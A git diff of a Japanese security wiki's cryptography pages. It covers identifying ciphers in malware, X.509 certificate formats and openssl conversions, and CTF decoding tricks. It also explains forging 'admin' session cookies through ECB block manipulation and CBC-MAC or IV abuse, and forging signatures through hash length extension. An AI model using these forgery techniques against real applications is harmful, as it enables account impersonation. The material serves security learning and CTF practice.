![](<../../images/image (208).png>)
## Serpent **(対称暗号)**
## Serpent **(対称暗号)**
### 特徴
- それを使用るマルウェアはあまり見られませんが、例Ursnifがあります。
- アルゴリズムがSerpentかどうかその長さ(非常に長い関数)に基づいて簡単に判断できます。
- それを使用しているマルウェアはあまり見られませんが、例Ursnifがあります。
- アルゴリズムがSerpentかどうかは、その長さ(非常に長い関数)に基づいて簡単に判断できます。
### 特定
次の画像では、定数**0x9E3779B9**が使用されていることに注意してください(この定数は**TEA**Tiny Encryption Algorithmなどの他の暗号アルゴリズムでも使用されます。\
次の画像では、定数**0x9E3779B9**が使用されていることに注意してください(この定数は**TEA**Tiny Encryption Algorithmなどの他の暗号アルゴリズムでも使用されています)。\
また、**ループのサイズ****132**)と**逆アセンブル**命令および**コード**例における**XOR操作の数**にも注意してください:
![](<../../images/image (547).png>)
前述のように、このコードは**非常に長い関数**として任意の逆コンパイラ内で視覚化できます。内部に**ジャンプ**がないためです。逆コンパイルされたコードは次のように見えることがあります:
前述のように、このコードは、内部に**ジャンプ**がないため、任意の逆コンパイラ内で**非常に長い関数**として視覚化できます。逆コンパイルされたコードは次のようになります:
![](<../../images/image (513).png>)
したがって、**マジックナンバー**と**初期XOR**を確認し、**非常に長い関数**を見て、**長い関数のいくつかの命令を実装と比較する**ことで、このアルゴリズムを特定することが可能です左に7シフトし、22回左回転するなど
したがって、**マジックナンバー**と**初期XOR**を確認し、**非常に長い関数**を見て、**長い関数のいくつかの命令を実装**左に7シフトし、22に左回転する**比較する**ことで、このアルゴリズムを特定することが可能です。
## RSA **(非対称暗号)**
## RSA **(非対称暗号)**
### 特徴
@ -126,7 +124,7 @@
![](<../../images/image (1113).png>)
- 行11には`+7) >> 3`があり、行35には`+7) / 8`があります。
- 行11には`+7) >> 3`があり、行35と同じです:`+7) / 8`
- 行12`modulus_len < 0x040`を確認しており、行36`inputLen+11 > modulusLen`を確認しています。
## MD5 & SHAハッシュ
@ -152,12 +150,12 @@
## CRCハッシュ
- 小さく、データの偶発的な変更を見つけるために効率的です。
- より小さく、データの偶発的な変更を見つけるために効率的です。
- ルックアップテーブルを使用します(したがって、定数を特定できます)。
### 特定
**ルックアップテーブル定数**を確認してください:
**ルックアップテーブル定数**を確認してください:
![](<../../images/image (508).png>)
@ -170,7 +168,7 @@ CRCハッシュアルゴリズムは次のようになります
### 特徴
- 認識可能な定数はありません。
- アルゴリズムをPythonで書いて、オンラインで類似のものを検索してみることができます。
- アルゴリズムをPythonで書いて、オンラインで類似のものを検索することを試みることができます。
### 特定
@ -178,7 +176,7 @@ CRCハッシュアルゴリズムは次のようになります
![](<../../images/image (207) (2) (1).png>)
それを認識するための**3つの比較**を確認してください:
特定するために**3つの比較**を確認してください:
![](<../../images/image (430).png>)

157
src/cryptography/certificates.md
View File

@ -1,157 +0,0 @@
# 証明書
{{#include ../banners/hacktricks-training.md}}
## 証明書とは
**公開鍵証明書**は、暗号学で誰かが公開鍵を所有していることを証明するために使用されるデジタルIDです。これには鍵の詳細、所有者の身元サブジェクト、および信頼できる機関発行者からのデジタル署名が含まれます。ソフトウェアが発行者を信頼し、署名が有効であれば、鍵の所有者との安全な通信が可能です。
証明書は主に[証明書機関](https://en.wikipedia.org/wiki/Certificate_authority)CAによって[公開鍵基盤](https://en.wikipedia.org/wiki/Public-key_infrastructure)PKI設定で発行されます。別の方法は[信頼のウェブ](https://en.wikipedia.org/wiki/Web_of_trust)で、ユーザーが直接お互いの鍵を検証します。証明書の一般的な形式は[X.509](https://en.wikipedia.org/wiki/X.509)で、RFC 5280に記載されている特定のニーズに合わせて適応できます。
## x509の一般的なフィールド
### **x509証明書の一般的なフィールド**
x509証明書には、証明書の有効性とセキュリティを確保するために重要な役割を果たすいくつかの**フィールド**があります。これらのフィールドの内訳は以下の通りです:
- **バージョン番号**はx509形式のバージョンを示します。
- **シリアル番号**は、証明書機関CAのシステム内で証明書を一意に識別し、主に取り消し追跡のために使用されます。
- **サブジェクト**フィールドは、証明書の所有者を表し、機械、個人、または組織である可能性があります。詳細な識別情報が含まれます:
- **共通名CN**:証明書でカバーされるドメイン。
- **国C**、**地域L**、**州または省ST、S、またはP**、**組織O**、および**組織単位OU**は、地理的および組織的な詳細を提供します。
- **識別名DN**は、完全なサブジェクト識別を encapsulates します。
- **発行者**は、証明書を検証し署名した人を示し、CAのためのサブフィールドが含まれます。
- **有効期間**は、**Not Before**および**Not After**のタイムスタンプで示され、証明書が特定の日付の前または後に使用されないことを保証します。
- **公開鍵**セクションは、証明書のセキュリティにとって重要で、公開鍵のアルゴリズム、サイズ、およびその他の技術的詳細を指定します。
- **x509v3拡張**は、証明書の機能を強化し、**鍵の使用**、**拡張鍵の使用**、**サブジェクト代替名**、および証明書の適用を微調整するためのその他のプロパティを指定します。
#### **鍵の使用と拡張**
- **鍵の使用**は、公開鍵の暗号学的アプリケーションを特定します。例えば、デジタル署名や鍵の暗号化などです。
- **拡張鍵の使用**は、証明書の使用ケースをさらに絞り込みます。例えば、TLSサーバー認証のためです。
- **サブジェクト代替名**および**基本制約**は、証明書でカバーされる追加のホスト名と、それがCAまたはエンドエンティティ証明書であるかどうかを定義します。
- **サブジェクト鍵識別子**や**権限鍵識別子**のような識別子は、鍵の一意性と追跡可能性を保証します。
- **権限情報アクセス**および**CRL配布ポイント**は、発行CAを検証し、証明書の取り消し状況を確認するためのパスを提供します。
- **CTプレ証明書SCT**は、証明書に対する公的信頼にとって重要な透明性ログを提供します。
```python
# Example of accessing and using x509 certificate fields programmatically:
from cryptography import x509
from cryptography.hazmat.backends import default_backend
# Load an x509 certificate (assuming cert.pem is a certificate file)
with open("cert.pem", "rb") as file:
cert_data = file.read()
certificate = x509.load_pem_x509_certificate(cert_data, default_backend())
# Accessing fields
serial_number = certificate.serial_number
issuer = certificate.issuer
subject = certificate.subject
public_key = certificate.public_key()
print(f"Serial Number: {serial_number}")
print(f"Issuer: {issuer}")
print(f"Subject: {subject}")
print(f"Public Key: {public_key}")
```
### **OCSPとCRL配布ポイントの違い**
**OCSP** (**RFC 2560**) は、クライアントとレスポンダーが協力してデジタル公開鍵証明書が取り消されたかどうかを確認する方法で、完全な**CRL**をダウンロードする必要がありません。この方法は、取り消された証明書のシリアル番号のリストを提供する従来の**CRL**よりも効率的であり、潜在的に大きなファイルをダウンロードする必要があります。CRLには最大512エントリが含まれることがあります。詳細は[こちら](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm)で確認できます。
### **証明書の透明性とは**
証明書の透明性は、SSL証明書の発行と存在がドメイン所有者、CA、およびユーザーに見えるようにすることで、証明書関連の脅威と戦うのに役立ちます。その目的は次のとおりです
- ドメイン所有者の知らないうちにCAがドメインのSSL証明書を発行するのを防ぐこと。
- 誤ってまたは悪意を持って発行された証明書を追跡するためのオープンな監査システムを確立すること。
- ユーザーを詐欺的な証明書から保護すること。
#### **証明書ログ**
証明書ログは、ネットワークサービスによって維持される公開監査可能な追加専用の証明書記録です。これらのログは監査目的のための暗号的証明を提供します。発行機関と一般の人々は、これらのログに証明書を提出したり、検証のために照会したりできます。ログサーバーの正確な数は固定されていませんが、世界中で千未満であると予想されています。これらのサーバーは、CA、ISP、または関心のある任意の団体によって独立して管理されることがあります。
#### **照会**
任意のドメインの証明書透明性ログを探索するには、[https://crt.sh/](https://crt.sh)にアクセスしてください。
証明書を保存するためのさまざまな形式が存在し、それぞれに独自の使用ケースと互換性があります。この要約では、主要な形式をカバーし、それらの間の変換に関するガイダンスを提供します。
## **形式**
### **PEM形式**
- 証明書の最も広く使用されている形式。
- 証明書と秘密鍵のために別々のファイルが必要で、Base64 ASCIIでエンコードされています。
- 一般的な拡張子:.cer、.crt、.pem、.key。
- 主にApacheや同様のサーバーで使用されます。
### **DER形式**
- 証明書のバイナリ形式。
- PEMファイルに見られる「BEGIN/END CERTIFICATE」ステートメントがありません。
- 一般的な拡張子:.cer、.der。
- Javaプラットフォームでよく使用されます。
### **P7B/PKCS#7形式**
- Base64 ASCIIで保存され、拡張子は.p7bまたは.p7cです。
- 秘密鍵を除く証明書とチェーン証明書のみを含みます。
- Microsoft WindowsおよびJava Tomcatでサポートされています。
### **PFX/P12/PKCS#12形式**
- サーバー証明書、中間証明書、および秘密鍵を1つのファイルにカプセル化するバイナリ形式。
- 拡張子:.pfx、.p12。
- 主にWindowsで証明書のインポートとエクスポートに使用されます。
### **形式の変換**
**PEM変換**は互換性のために重要です:
- **x509からPEMへ**
```bash
openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem
```
- **PEMからDERへ**
```bash
openssl x509 -outform der -in certificatename.pem -out certificatename.der
```
- **DERからPEMへ**
```bash
openssl x509 -inform der -in certificatename.der -out certificatename.pem
```
- **PEM から P7B へ**
```bash
openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer
```
- **PKCS7をPEMに**
```bash
openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem
```
**PFX 変換**は、Windows上での証明書管理において重要です
- **PFX から PEM**
```bash
openssl pkcs12 -in certificatename.pfx -out certificatename.pem
```
- **PFXからPKCS#8への変換**は2つのステップを含みます
1. PFXをPEMに変換する
```bash
openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem
```
2. PEMをPKCS8に変換する
```bash
openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8
```
- **P7B to PFX** には2つのコマンドが必要です
1. P7BをCERに変換します
```bash
openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer
```
2. CERとプライベートキーをPFXに変換する
```bash
openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer
```
---
{{#include ../banners/hacktricks-training.md}}

55
src/cryptography/cipher-block-chaining-cbc-mac-priv.md
View File

@ -1,55 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
# CBC
もし**クッキー**が**ユーザー名**だけ(またはクッキーの最初の部分がユーザー名である)で、ユーザー名「**admin**」を偽装したい場合、ユーザー名「**bdmin**」を作成し、クッキーの**最初のバイト**を**ブルートフォース**することができます。
# CBC-MAC
**暗号ブロック連鎖メッセージ認証コード****CBC-MAC**)は、暗号学で使用される方法です。これは、メッセージをブロックごとに暗号化し、各ブロックの暗号化が前のブロックにリンクされることで機能します。このプロセスは**ブロックの連鎖**を作成し、元のメッセージのビットを1つ変更するだけでも、暗号化されたデータの最後のブロックに予測不可能な変化をもたらすことを保証します。このような変更を行うまたは逆にするためには、暗号化キーが必要であり、セキュリティが確保されます。
メッセージmのCBC-MACを計算するには、ゼロ初期化ベクトルでCBCモードでmを暗号化し、最後のブロックを保持します。以下の図は、秘密鍵kとブロック暗号Eを使用して、ブロックからなるメッセージのCBC-MACの計算を概略しています[https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5)
![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_(en).svg/570px-CBC-MAC_structure_(en).svg.png](<https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_(en).svg/570px-CBC-MAC_structure_(en).svg.png>)
# 脆弱性
CBC-MACでは通常**使用されるIVは0**です。\
これは問題です。なぜなら、2つの既知のメッセージ`m1``m2`が独立して2つの署名`s1``s2`)を生成するからです。したがって:
- `E(m1 XOR 0) = s1`
- `E(m2 XOR 0) = s2`
次に、m1とm2を連結したメッセージm3は2つの署名s31とs32を生成します
- `E(m1 XOR 0) = s31 = s1`
- `E(m2 XOR s1) = s32`
**これは暗号化のキーを知らなくても計算可能です。**
あなたが**Administrator**という名前を**8バイト**のブロックで暗号化していると想像してください:
- `Administ`
- `rator\00\00\00`
あなたは「**Administ**」というユーザー名m1を作成し、署名s1を取得できます。\
次に、`rator\00\00\00 XOR s1`の結果を持つユーザー名を作成できます。これにより、`E(m2 XOR s1 XOR 0)`がs32を生成します。\
今、s32を**Administrator**のフルネームの署名として使用できます。
### まとめ
1. ユーザー名「**Administ**」m1の署名を取得し、それがs1です。
2. ユーザー名「**rator\x00\x00\x00 XOR s1 XOR 0**」の署名はs32です。
3. クッキーをs32に設定すると、ユーザー「**Administrator**」の有効なクッキーになります。
# IVの制御攻撃
使用されるIVを制御できる場合、攻撃は非常に簡単になる可能性があります。\
クッキーが単に暗号化されたユーザー名である場合、ユーザー「**administrator**」を偽装するために、ユーザー「**Administrator**」を作成し、そのクッキーを取得できます。\
今、IVを制御できる場合、IVの最初のバイトを変更することができ、**IV\[0] XOR "A" == IV'\[0] XOR "a"**となり、ユーザー「**Administrator**」のクッキーを再生成できます。このクッキーは、初期**IV**を使用してユーザー「**administrator**」を**偽装**するのに有効です。
## 参考文献
詳細は[https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)を参照してください。
{{#include ../banners/hacktricks-training.md}}

269
src/cryptography/crypto-ctfs-tricks.md
View File

@ -1,269 +0,0 @@
# Crypto CTFs Tricks
{{#include ../banners/hacktricks-training.md}}
## Online Hashes DBs
- _**Google it**_
- [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240)
- [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com)
- [https://crackstation.net/](https://crackstation.net)
- [https://md5decrypt.net/](https://md5decrypt.net)
- [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com)
- [https://gpuhash.me/](https://gpuhash.me)
- [https://hashes.org/search.php](https://hashes.org/search.php)
- [https://www.cmd5.org/](https://www.cmd5.org)
- [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
- [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
## Magic Autosolvers
- [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
- [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic module)
- [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
- [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking)
## Encoders
ほとんどのエンコードされたデータは、これらの2つのリソースでデコードできます
- [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
- [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
### Substitution Autosolvers
- [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
- [https://quipqiup.com/](https://quipqiup.com) - とても良い!
#### Caesar - ROTx Autosolvers
- [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript)
#### Atbash Cipher
- [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)
### Base Encodings Autosolver
これらのすべてのベースを確認してください: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
- **Ascii85**
- `BQ%]q@psCd@rH0l`
- **Base26** \[_A-Z_]
- `BQEKGAHRJKHQMVZGKUXNT`
- **Base32** \[_A-Z2-7=_]
- `NBXWYYLDMFZGCY3PNRQQ====`
- **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
- `pbzsaamdcf3gna5xptoo====`
- **Base32 Geohash** \[_0-9b-hjkmnp-z_]
- `e1rqssc3d5t62svgejhh====`
- **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_]
- `D1QPRRB3C5S62RVFDHGG====`
- **Base32 Extended Hexadecimal** \[_0-9A-V_]
- `D1NMOOB3C5P62ORFDHGG====`
- **Base45** \[_0-9A-Z $%\*+-./:_]
- `59DPVDGPCVKEUPCPVD`
- **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_]
- `2yJiRg5BF9gmsU6AC`
- **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_]
- `2YiHqF5bf9FLSt6ac`
- **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
- `pyJ5RgnBE9gm17awU`
- **Base62** \[_0-9A-Za-z_]
- `g2AextRZpBKRBzQ9`
- **Base64** \[_A-Za-z0-9+/=_]
- `aG9sYWNhcmFjb2xh`
- **Base67** \[_A-Za-z0-9-_.!\~\_]
- `NI9JKX0cSUdqhr!p`
- **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
- `BQ%]q@psCd@rH0l`
- **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
- `<~BQ%]q@psCd@rH0l~>`
- **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
- `Xm4y`V\_|Y(V{dF>\`
- **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
- `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
- **Base85 (XML)** \[\_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\_\_]
- `Xm4y|V{~Y+V}dF?`
- **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
- `frDg[*jNN!7&BQM`
- **Base100** \[]
- `👟👦👣👘👚👘👩👘👚👦👣👘`
- **Base122** \[]
- `4F ˂r0Xmvc`
- **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
- `MIc3KiXa+Ihz+lrXMIc3KbCC`
- **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
- `DmPsv8J7qrlKEoY7`
- **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
- `kLD8iwKsigSalLJ5`
- **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
- `ayRiIo1gpO+uUc7g`
- **ESAB46** \[]
- `3sHcL2NR8WrT7mhR`
- **MEGAN45** \[]
- `kLD8igSXm2KZlwrX`
- **TIGO3FX** \[]
- `7AP9mIzdmltYmIP9mWXX`
- **TRIPO5** \[]
- `UE9vSbnBW6psVzxB`
- **FERON74** \[]
- `PbGkNudxCzaKBm0x`
- **GILA7** \[]
- `D+nkv8C1qIKMErY1`
- **Citrix CTX1** \[]
- `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
[http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html)
### HackerizeXS \[_╫Λ↻├☰┏_]
```
╫☐↑Λ↻Λ┏Λ↻☐↑Λ
```
### モールス
```
.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
```
- [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 デッド: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
### UUencoder
```
begin 644 webutils_pl
M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(
M3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/
F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$`
`
end
```
- [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)
### XXEncoder
```
begin 644 webutils_pl
hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236
5Hol-G2xAEE++
end
```
- [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)
### YEncoder
```
=ybegin line=128 size=28 name=webutils_pl
ryvkryvkryvkryvkryvkryvkryvk
=yend size=28 crc32=35834c86
```
- [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc)
### BinHex
```
(This file must be converted with BinHex 4.0)
:#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p
-38K26%'d9J!!:
```
- [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex)
### ASCII85
```
<~85DoF85DoF85DoF85DoF85DoF85DoF~>
```
- [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85)
### ドボラックキーボード
```
drnajapajrna
```
- [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard)
### A1Z26
文字をその数値に変換する
```
8 15 12 1 3 1 18 1 3 15 12 1
```
### アフィン暗号エンコード
文字を数に `(ax+b)%26` (_a_ と _b_ はキーで、_x_ は文字) し、結果を文字に戻します。
```
krodfdudfrod
```
### SMSコード
**Multitap** [は文字を置き換えます](https://www.dcode.fr/word-letter-change) モバイル [電話のキーパッド](https://www.dcode.fr/phone-keypad-cipher) の対応するキーコードによって定義された繰り返しの数字でこのモードはSMSを書くときに使用されます。\
例えば: 2=A, 22=B, 222=C, 3=D...\
このコードは**いくつかの数字が繰り返される**のを見ることで識別できます。
このコードをデコードすることができます: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher)
### ベーコンコード
各文字を4つのAまたはBまたは1と0に置き換えます。
```
00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000
AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
```
### ルーン
![](../images/runes.jpg)
## 圧縮
**Raw Deflate** と **Raw Inflate** (両方ともCyberchefで見つけることができます) は、ヘッダーなしでデータを圧縮および解凍できます。
## 簡単な暗号
### XOR - 自動解決
- [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/)
### ビフィド
キーワードが必要です
```
fgaargaamnlunesuneoa
```
### Vigenere
キーワードが必要です
```
wodsyoidrods
```
- [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)
- [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
- [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx)
## 強力な暗号
### フェルネット
2つのbase64文字列トークンとキー
```
Token:
gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q==
Key:
-s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI=
```
- [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode)
### サミール秘密分散
秘密はX部分に分割され、回復するにはY部分が必要です_Y <=X_
```
8019f8fa5879aa3e07858d08308dc1a8b45
80223035713295bddf0b0bd1b10a5340b89
803bc8cf294b3f83d88e86d9818792e80cd
```
[http://christian.gen.co/secrets/](http://christian.gen.co/secrets/)
### OpenSSLブルートフォース
- [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
- [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF)
## ツール
- [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool)
- [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom)
- [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster)
{{#include ../banners/hacktricks-training.md}}

68
src/cryptography/electronic-code-book-ecb.md
View File

@ -1,68 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
# ECB
(ECB) 電子コードブック - 対称暗号化方式で、**平文の各ブロックを** **暗号文のブロックに置き換えます**。これは**最も単純な**暗号化方式です。主なアイデアは、**平文をNビットのブロックに分割**(入力データのブロックサイズ、暗号化アルゴリズムに依存)し、次にその平文の各ブロックを唯一のキーを使用して暗号化(復号化)することです。
![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png)
ECBを使用することには複数のセキュリティ上の影響があります
- **暗号化されたメッセージからブロックを削除できる**
- **暗号化されたメッセージからブロックを移動できる**
# 脆弱性の検出
アプリケーションに何度もログインすると、**常に同じクッキーを取得する**ことを想像してください。これは、アプリケーションのクッキーが**`<username>|<password>`**であるためです。\
次に、**同じ長いパスワード**と**ほぼ同じ****ユーザー名**を持つ新しいユーザーを2人生成します。\
**両方のユーザーの情報が同じである8Bのブロックが** **等しい**ことがわかります。次に、これは**ECBが使用されている**ためかもしれないと想像します。
次の例のように。これらの**2つのデコードされたクッキー**が何度もブロック**`\x23U\xE45K\xCB\x21\xC8`**を持っていることに注目してください。
```
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9
```
これは、**それらのクッキーのユーザー名とパスワードに「a」という文字が何度も含まれていたため**です(例えば)。**異なる**ブロックは、**少なくとも1つの異なる文字**(区切り文字「|」やユーザー名の必要な違いなど)を含むブロックです。
今、攻撃者はフォーマットが`<username><delimiter><password>`または`<password><delimiter><username>`のどちらであるかを発見する必要があります。そのために、**似たような長いユーザー名とパスワードを持ついくつかのユーザー名を生成するだけで、フォーマットと区切り文字の長さを見つけることができます:**
| ユーザー名の長さ: | パスワードの長さ: | ユーザー名+パスワードの長さ: | クッキーの長さ(デコード後): |
| ---------------- | ---------------- | ------------------------- | --------------------------------- |
| 2 | 2 | 4 | 8 |
| 3 | 3 | 6 | 8 |
| 3 | 4 | 7 | 8 |
| 4 | 4 | 8 | 16 |
| 7 | 7 | 14 | 16 |
# 脆弱性の悪用
## 全体のブロックを削除する
クッキーのフォーマット(`<username>|<password>`)を知っている場合、ユーザー名`admin`を偽装するために、`aaaaaaaaadmin`という新しいユーザーを作成し、クッキーを取得してデコードします:
```
\x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
```
以前に作成されたパターン `\x23U\xE45K\xCB\x21\xC8` を見ることができます。このパターンは、`a` のみを含むユーザー名で作成されました。\
次に、最初の8Bのブロックを削除すると、ユーザー名 `admin` の有効なクッキーが得られます:
```
\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4
```
## ブロックの移動
多くのデータベースでは、`WHERE username='admin';`を検索するのと、`WHERE username='admin ';`を検索するのは同じです。 _(余分なスペースに注意)_
したがって、ユーザー`admin`を偽装する別の方法は次のとおりです:
- `len(<username>) + len(<delimiter) % len(block)`を満たすユーザー名を生成します。ブロックサイズが`8B`の場合、`username `というユーザー名を生成できます。デリミタ`|`を使用すると、チャンク`<username><delimiter>`は2つの8Bのブロックを生成します。
- 次に、偽装したいユーザー名とスペースを含む正確な数のブロックを埋めるパスワードを生成します。例えば、`admin `のように。
このユーザーのクッキーは3つのブロックで構成されます最初の2つはユーザー名+デリミタのブロックで、3つ目はユーザー名を偽装しているパスワードです`username |admin `
**次に、最初のブロックを最後のブロックと置き換えるだけで、ユーザー`admin`を偽装します:`admin |username`**
## 参考文献
- [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](<http://cryptowiki.net/index.php?title=Electronic_Code_Book_(ECB)>)
{{#include ../banners/hacktricks-training.md}}

38
src/cryptography/hash-length-extension-attack.md
View File

@ -1,38 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
# 攻撃の概要
サーバーが**データ**に**秘密**を追加して**署名**し、そのデータをハッシュ化していると想像してください。もしあなたが以下を知っているなら:
- **秘密の長さ**(これは与えられた長さの範囲からブルートフォースで求めることもできます)
- **平文データ**
- **アルゴリズム(そしてそれがこの攻撃に対して脆弱であること)**
- **パディングが知られている**
- 通常はデフォルトのものが使用されるため、他の3つの要件が満たされていれば、これもそうです
- パディングは秘密+データの長さに応じて異なるため、秘密の長さが必要です
その場合、**攻撃者**は**データ**を**追加**し、**以前のデータ + 追加されたデータ**の有効な**署名**を**生成**することが可能です。
## どうやって?
基本的に、脆弱なアルゴリズムは最初に**データのブロックをハッシュ化**し、その後、**以前に**作成された**ハッシュ**(状態)から**次のデータのブロックを追加**して**ハッシュ化**します。
例えば、秘密が「secret」でデータが「data」の場合、「secretdata」のMD5は6036708eba0d11f6ef52ad44e8b74d5bです。\
攻撃者が「append」という文字列を追加したい場合、彼は以下のことができます
- 64個の「A」のMD5を生成する
